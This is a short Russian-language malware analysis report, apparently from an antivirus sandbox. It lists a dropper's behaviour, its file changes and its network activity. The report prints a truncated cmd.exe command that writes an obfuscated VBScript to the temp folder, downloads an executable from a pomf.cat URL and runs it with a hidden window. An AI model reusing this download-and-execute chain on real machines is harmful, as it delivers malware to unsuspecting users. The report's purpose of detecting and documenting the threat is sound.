Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO R4q= "http://a.pomf.cat/cdwujo.exe">>T2d.VBS &@ECHO W2x = Z4y("ccha^H_r_")>>T2d.VBS &@ECHO Set E0l = CreateObject(Z4y("gmrgfLHrgfbnnj"))>>T2d.VBS &@ECHO E0l.Open Z4y("a_n")...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\t2d.vbs
Удаляет следующие файлы
- %TEMP%\t2d.vbs
Сетевая активность
Подключается к
- 'a.##mf.cat':80
TCP
Запросы HTTP GET
- http://a.##mf.cat/cdwujo.exe
UDP
- DNS ASK a.##mf.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\T2d.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO R4q= "http://a.pomf.cat/cdwujo.exe">>T2d.VBS &@ECHO W2x = Z4y("ccha^H_r_")>>T2d.VBS &@ECHO Set E0l = CreateObject(Z4y("gmrgfLHrgfbnnj"))>>T2d.VBS &@ECHO E0l.Open Z4y("a_n")...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
